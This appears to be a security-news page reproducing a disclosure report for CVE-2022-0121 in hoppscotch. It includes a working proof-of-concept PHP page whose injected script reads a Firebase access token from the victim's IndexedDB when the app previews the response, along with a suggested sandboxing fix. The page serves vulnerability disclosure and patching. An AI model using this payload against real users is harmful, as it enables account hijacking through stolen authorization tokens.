Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0121: Exposure of Sensitive Information to an Unauthorized Actor in hoppscotch

hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

CVE
Open in Source
#xss#web#google#js

Description

Steal authorization token via xss and hijack attack

Proof of Concept

Using this attack , attacker can hijack account by stealing authorization header . I see there is team based collaboration exists ,so one user can hack other user account using this bug .

STEP

First host bellow php file in your webserver

// cors2.php
<?php
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        header('Access-Control-Allow-Origin: *');
        header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
        header('Access-Control-Allow-Headers: *');
        header('Access-Control-Max-Age: 1728000');
        header('Content-Length: 0');
        header('Content-Type: text/plain');
        die();
    }

    header('Access-Control-Allow-Origin: *');
    //header('Content-Type: application/json');
     header('Content-Type: text/html');
    //header("Location: http://mysite.com/cors.php");
 //   $ret = [
   //     'result' => 'OK',
    //];
   // print json_encode($ret);
    //echo "chut\"'><img src=x onerror=alert(document.cookie)>";
    echo '<script>//alert();
var dbs=window.indexedDB.open("firebaseLocalStorageDb",1);
dbs.onsuccess = function(event) {
  db = event.target.result;
  var tt=db.transaction(["firebaseLocalStorage"]).objectStore("firebaseLocalStorage")
var tt2=tt.getAllKeys();
//console.log(tt2)
 tt2.onsuccess=function(yy){
  keyss=yy.target.result[0];//alert(keyss)
  var mm=tt.get(keyss);//console.log(mm)
 mm.onsuccess=function(kk){
 var xx=kk.target.result.value.stsTokenManager.accessToken
  alert(xx)
  }
  }
};
</script>
         ';
?>

Lets your webserver url is http://mysite.com/cors2.php
Now login to you account and fetch above url and preview the request and see xss is executed and it will fetch authorization token .

VIDEO POC

https://drive.google.com/file/d/1JLFiL0S9YLYjPNleoTOoQZQOylDfXfwn/view?usp=sharing

SUGGESTED FIX

When you previewing as html then render it in sandbox , so that it cant acccess authorization token . Simply create a div element with sandbox attribute and render the response there .

Impact

Full account hijack by stealing Authorization token

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE